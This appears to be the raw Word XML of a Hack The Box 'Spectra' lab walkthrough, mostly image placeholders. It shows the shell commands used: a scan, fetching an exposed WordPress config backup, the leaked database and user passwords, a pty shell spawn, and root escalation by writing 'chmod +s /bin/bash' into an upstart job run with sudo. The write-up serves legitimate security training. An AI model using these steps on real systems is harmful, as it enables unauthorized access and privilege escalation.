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13DC" w:rsidRDefault="00866469">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="720C3C79" wp14:editId="190A91C5">
            <wp:extent cx="4886325" cy="2914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469" w:rsidRDefault="00866469"/>
    <w:p w:rsidR="005F221B" w:rsidRDefault="005F221B" w:rsidP="005F221B">
      <w:r>
        <w:t>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866469" w:rsidRDefault="005F221B" w:rsidP="005F221B">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 10.10.10.229</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F221B" w:rsidRDefault="008538B8" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A6C5993" wp14:editId="5ADDA166">
            <wp:extent cx="5676900" cy="6067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B8" w:rsidRDefault="008538B8" w:rsidP="005F221B"/>
    <w:p w:rsidR="008538B8" w:rsidRDefault="00195691" w:rsidP="005F221B">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00DE7A1D" w:rsidRPr="009842E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.10.229:8081/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DE7A1D" w:rsidRDefault="00476514" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A7F36AB" wp14:editId="697D342C">
            <wp:extent cx="4714875" cy="1028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14" w:rsidRDefault="00476514" w:rsidP="005F221B"/>
    <w:p w:rsidR="0075440F" w:rsidRDefault="00195691" w:rsidP="005F221B">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00D20F2E" w:rsidRPr="009842E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.10.229/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00476514" w:rsidRDefault="00F07DB9" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F338258" wp14:editId="47643942">
            <wp:extent cx="5943600" cy="16579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2C6" w:rsidRDefault="00E475EF" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194158E9" wp14:editId="1040540A">
            <wp:extent cx="3086100" cy="5810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5EF" w:rsidRDefault="00E475EF" w:rsidP="005F221B"/>
    <w:p w:rsidR="00E475EF" w:rsidRDefault="00195691" w:rsidP="005F221B">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00F74204" w:rsidRPr="009842E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://spectra.htb/main/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F74204" w:rsidRDefault="00EB208E" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E8E71D7" wp14:editId="3898C5E3">
            <wp:extent cx="5943600" cy="29514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8E" w:rsidRDefault="00EB208E" w:rsidP="005F221B"/>
    <w:p w:rsidR="00EB208E" w:rsidRDefault="00195691" w:rsidP="005F221B">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="003D6EFC" w:rsidRPr="009842E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://spectra.htb/testing/index.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D6EFC" w:rsidRDefault="00262015" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61EAD4A9" wp14:editId="7E7B8EEC">
            <wp:extent cx="5943600" cy="1264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15" w:rsidRDefault="00262015" w:rsidP="005F221B"/>
    <w:p w:rsidR="00262015" w:rsidRDefault="00195691" w:rsidP="005F221B">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00374FFF" w:rsidRPr="009842E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://spectra.htb/testing/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00374FFF" w:rsidRDefault="00ED6E35" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B3E7372" wp14:editId="7422C50B">
            <wp:extent cx="5943600" cy="41281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35" w:rsidRDefault="00ED6E35" w:rsidP="005F221B"/>
    <w:p w:rsidR="009B6736" w:rsidRDefault="009B6736" w:rsidP="009B6736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9B6736" w:rsidRDefault="009B6736" w:rsidP="009B6736">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http://spectra.htb/testing/wp-config.php.save</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED6E35" w:rsidRDefault="006B0825" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F44F870" wp14:editId="0D9529AB">
            <wp:extent cx="5943600" cy="1381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825" w:rsidRDefault="006B0825" w:rsidP="005F221B"/>
    <w:p w:rsidR="006B0825" w:rsidRDefault="009D1F20" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CBB821B" wp14:editId="592A5225">
            <wp:extent cx="5943600" cy="6305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F20" w:rsidRDefault="003E228C" w:rsidP="005F221B">
      <w:r w:rsidRPr="003E228C">
        <w:lastRenderedPageBreak/>
        <w:t>'DB_USER', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E228C">
        <w:t>devtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E228C">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E228C" w:rsidRDefault="00C72F33" w:rsidP="005F221B">
      <w:r w:rsidRPr="00C72F33">
        <w:t>'DB_PASSWORD', 'devteam01'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00772ED8" w:rsidRDefault="00772ED8" w:rsidP="005F221B"/>
    <w:p w:rsidR="00772ED8" w:rsidRDefault="00772ED8" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D33BF05" wp14:editId="1EBA5B29">
            <wp:extent cx="5943600" cy="37039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F33" w:rsidRDefault="00C72F33" w:rsidP="005F221B"/>
    <w:p w:rsidR="009D1F20" w:rsidRDefault="004F1552" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D9C221C" wp14:editId="43DCA915">
            <wp:extent cx="5943600" cy="2505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552" w:rsidRDefault="004F1552" w:rsidP="005F221B"/>
    <w:p w:rsidR="004F1552" w:rsidRDefault="0057232B" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B5D5236" wp14:editId="7E570B48">
            <wp:extent cx="4962525" cy="4229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2B" w:rsidRDefault="0057232B" w:rsidP="005F221B"/>
    <w:p w:rsidR="0057232B" w:rsidRDefault="00177207" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A01CB55" wp14:editId="32A8998F">
            <wp:extent cx="5943600" cy="16141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207" w:rsidRDefault="00177207" w:rsidP="005F221B"/>
    <w:p w:rsidR="00177207" w:rsidRDefault="00B97DFC" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="543C2437" wp14:editId="2AC3AC66">
            <wp:extent cx="5943600" cy="31953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DFC" w:rsidRDefault="00B97DFC" w:rsidP="005F221B"/>
    <w:p w:rsidR="00B97DFC" w:rsidRDefault="0057445E" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49778DE1" wp14:editId="2E0600C3">
            <wp:extent cx="4086225" cy="11144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45E" w:rsidRDefault="004E1CA1" w:rsidP="005F221B">
      <w:r>
        <w:t>python3 -c ‘</w:t>
      </w:r>
      <w:r w:rsidR="00B11B92" w:rsidRPr="00B11B92">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mport </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0057445E" w:rsidRDefault="00881BC8" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29B18924" wp14:editId="2AB3A9E0">
            <wp:extent cx="3848100" cy="1181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C8" w:rsidRDefault="00881BC8" w:rsidP="005F221B"/>
    <w:p w:rsidR="00881BC8" w:rsidRDefault="00FF7B4E" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F1AE87" wp14:editId="61890134">
            <wp:extent cx="5943600" cy="4684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B4E" w:rsidRDefault="00A6312F" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55034D04" wp14:editId="0C86D503">
            <wp:extent cx="5943600" cy="5256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12F" w:rsidRDefault="00A6312F" w:rsidP="005F221B"/>
    <w:p w:rsidR="00A6312F" w:rsidRDefault="003A48A4" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="611E7D49" wp14:editId="65DA7154">
            <wp:extent cx="4791075" cy="2200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A4" w:rsidRDefault="003A48A4" w:rsidP="005F221B"/>
    <w:p w:rsidR="003A48A4" w:rsidRDefault="00D85CDD" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A761035" wp14:editId="55D01595">
            <wp:extent cx="4914900" cy="236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DD" w:rsidRDefault="00D85CDD" w:rsidP="005F221B"/>
    <w:p w:rsidR="00D85CDD" w:rsidRDefault="00BC0964" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37B80D37" wp14:editId="1A05348C">
            <wp:extent cx="5943600" cy="40246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64" w:rsidRDefault="00BC0964" w:rsidP="005F221B"/>
    <w:p w:rsidR="00BC0964" w:rsidRDefault="004015FA" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73185C06" wp14:editId="7C331889">
            <wp:extent cx="4343400" cy="857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5FA" w:rsidRDefault="004015FA" w:rsidP="005F221B"/>
    <w:p w:rsidR="004015FA" w:rsidRDefault="00346537" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DF40771" wp14:editId="69832BD5">
            <wp:extent cx="3714750" cy="704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7" w:rsidRDefault="00346537" w:rsidP="005F221B"/>
    <w:p w:rsidR="00FE08C8" w:rsidRDefault="00FE08C8" w:rsidP="005F221B">
      <w:r>
        <w:t>We get the cred</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE08C8" w:rsidRDefault="00FE08C8" w:rsidP="005F221B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE08C8">
        <w:t>SummerHereWeCome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE08C8">
        <w:t>!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE08C8" w:rsidRDefault="00FE08C8" w:rsidP="005F221B"/>
    <w:p w:rsidR="00346537" w:rsidRDefault="007F3970" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DF5080A" wp14:editId="2740295E">
            <wp:extent cx="5943600" cy="1282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70" w:rsidRDefault="007F3970" w:rsidP="005F221B"/>
    <w:p w:rsidR="007F3970" w:rsidRDefault="00311819" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6799CEFD" wp14:editId="6E21C93D">
            <wp:extent cx="2905125" cy="771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1819" w:rsidRDefault="00311819" w:rsidP="005F221B">
      <w:r>
        <w:t xml:space="preserve">User.txt: </w:t>
      </w:r>
      <w:r w:rsidR="0015169E" w:rsidRPr="0015169E">
        <w:t>e89d27fe195e911</w:t>
      </w:r>
      <w:r w:rsidR="00195691">
        <w:t>XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00897C96" w:rsidRDefault="00897C96" w:rsidP="005F221B"/>
    <w:p w:rsidR="00897C96" w:rsidRDefault="00121974" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CD33CD3" wp14:editId="2F6B0E5B">
            <wp:extent cx="4324350" cy="685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974" w:rsidRDefault="00121974" w:rsidP="005F221B"/>
    <w:p w:rsidR="00121974" w:rsidRDefault="007F5095" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="141EB8D4" wp14:editId="6B0B531C">
            <wp:extent cx="5943600" cy="63785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095" w:rsidRDefault="00DA4D45" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13CF27E6" wp14:editId="0B0A2284">
            <wp:extent cx="5943600" cy="6068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45" w:rsidRDefault="00DF4B9C" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E9AA223" wp14:editId="6257DDB1">
            <wp:extent cx="5943600" cy="42062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B9C" w:rsidRDefault="00147F54" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44171AAA" wp14:editId="7A4FAFBB">
            <wp:extent cx="5943600" cy="6162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4" w:rsidRDefault="0004045F" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C7FD356" wp14:editId="021CA57C">
            <wp:extent cx="5657850" cy="1009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3F" w:rsidRDefault="0085633F" w:rsidP="005F221B"/>
    <w:p w:rsidR="0085633F" w:rsidRDefault="0085633F" w:rsidP="0085633F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>katie@spectra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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $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initctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> list | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0085633F" w:rsidRDefault="00C77BB3" w:rsidP="0085633F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A122104" wp14:editId="4937D6CD">
            <wp:extent cx="4476750" cy="23717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3F" w:rsidRDefault="0085633F" w:rsidP="0085633F"/>
    <w:p w:rsidR="0094256E" w:rsidRDefault="0094256E" w:rsidP="0085633F">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094256E">
        <w:t>katie@spectra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094256E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094256E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094256E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094256E">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094256E">
        <w:t xml:space="preserve"> $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094256E">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094256E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094256E">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094256E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094256E">
        <w:t>initctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094256E">
        <w:t xml:space="preserve"> stop test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094256E" w:rsidRDefault="00794BD0" w:rsidP="0085633F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75CB4693" wp14:editId="00B6C5D6">
            <wp:extent cx="4391025" cy="514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F18" w:rsidRDefault="001F4F18" w:rsidP="001F4F18">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>katie@spectra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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $ cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001F4F18" w:rsidRDefault="001F4F18" w:rsidP="001F4F18">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="001F4F18" w:rsidRDefault="001F4F18" w:rsidP="001F4F18">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +s /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F4F18" w:rsidRDefault="001F4F18" w:rsidP="001F4F18">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F4F18" w:rsidRDefault="001F4F18" w:rsidP="001F4F18">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F1C29DD" wp14:editId="6371F6E2">
            <wp:extent cx="3209925" cy="1571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7D" w:rsidRDefault="00744BD5" w:rsidP="005F221B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>katie@spectra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t xml:space="preserve"> $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>initctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t xml:space="preserve"> start test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744BD5" w:rsidRDefault="00744BD5" w:rsidP="005F221B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>katie@spectra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744BD5">
        <w:t xml:space="preserve"> $ /bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00574BF2" w:rsidRDefault="00574BF2" w:rsidP="005F221B"/>
    <w:p w:rsidR="00574BF2" w:rsidRDefault="00574BF2" w:rsidP="005F221B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00606765" w:rsidRDefault="00606765" w:rsidP="005F221B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B5072F9" wp14:editId="4ECEBEA7">
            <wp:extent cx="5943600" cy="11798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65" w:rsidRDefault="00606765" w:rsidP="005F221B">
      <w:r>
        <w:t xml:space="preserve">Root.txt: </w:t>
      </w:r>
      <w:r w:rsidRPr="00606765">
        <w:t>d44519713b889d5e</w:t>
      </w:r>
      <w:r w:rsidR="00195691">
        <w:t>XXXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E1D46" w:rsidRDefault="006E1D46" w:rsidP="005F221B"/>
    <w:p w:rsidR="006E1D46" w:rsidRDefault="006E1D46" w:rsidP="005F221B"/>
    <w:p w:rsidR="00FC6E9E" w:rsidRDefault="00FC6E9E" w:rsidP="005F221B"/>
    <w:p w:rsidR="00FC6E9E" w:rsidRDefault="00FC6E9E" w:rsidP="005F221B"/>
    <w:p w:rsidR="006F0293" w:rsidRDefault="006F0293" w:rsidP="005F221B"/>
    <w:p w:rsidR="006F0293" w:rsidRDefault="006F0293" w:rsidP="005F221B"/>
    <w:p w:rsidR="0015169E" w:rsidRDefault="0015169E" w:rsidP="005F221B"/>
    <w:p w:rsidR="0015169E" w:rsidRDefault="0015169E" w:rsidP="005F221B"/>
    <w:p w:rsidR="00607227" w:rsidRDefault="00607227" w:rsidP="005F221B"/>
    <w:sectPr w:rsidR="006072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575"/>
    <w:rsid w:val="0004045F"/>
    <w:rsid w:val="00121974"/>
    <w:rsid w:val="00147F54"/>
    <w:rsid w:val="0015169E"/>
    <w:rsid w:val="001658AA"/>
    <w:rsid w:val="00177207"/>
    <w:rsid w:val="00182E98"/>
    <w:rsid w:val="00195691"/>
